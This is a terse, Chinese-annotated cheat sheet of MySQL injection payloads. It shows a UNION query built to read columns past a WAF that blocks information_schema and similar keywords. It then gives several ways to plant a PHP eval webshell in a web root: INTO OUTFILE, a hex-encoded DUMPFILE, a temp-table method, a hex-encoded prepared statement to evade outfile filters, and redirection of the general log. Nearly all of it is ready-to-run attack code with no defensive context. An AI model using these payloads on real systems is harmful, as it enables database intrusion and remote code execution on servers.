waf拦截了information_schema,columns,tablesm,database,schema等关键字或函数
select * from test where id =1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from test)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
webshell
select '<?php @eval($_POST["pass"]);?>' into outfile 'var/www/html/shell.php'
select 0x3c3f70687020406576616c28245f504f53545b2270617373225d293b3f3e into dumpfile 'D:/www/shell.php'
drop table if exists temp;creat table temp(cmd text not null);insert into temp (cmd) values('<?php @eval($_POST["pass"]) ?>');select cmd from temp into out file '/var/www/html/shell.php';drop table if exists temp;
bypass outfile,dumpfile
set @a =
0x73656c65637420273c3f70687020406576616c28245f504f53545b2270617373225d293b3f3e2720696e746f206f757466696c6520272f686f6d652f7777772f7368656c6c2e70687027;prepare cmd from @a;execute cmd;
show variables like '%general%'; #查看配置
set global general_log = on; # 开启general log模式
set global general_log_file= '/var/www/html/shell.php' #设置日志目录是shell目录
select '<?php eval($_POST[pass]);?>' #写入shell
CREATE TABLE IF NOT EXISTS `general_log` (
`event_time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
`user_host` mediumtext NOT NULL,
`thread_id` int(11) NOT NULL,
`server_id` int(10) unsigned NOT NULL,
`command_type` varchar(64) NOT NULL,
`argument` mediumtext NOT NULL
) ENGINE=CSV DEFAULT CHARSET=utf8 COMMENT='General log';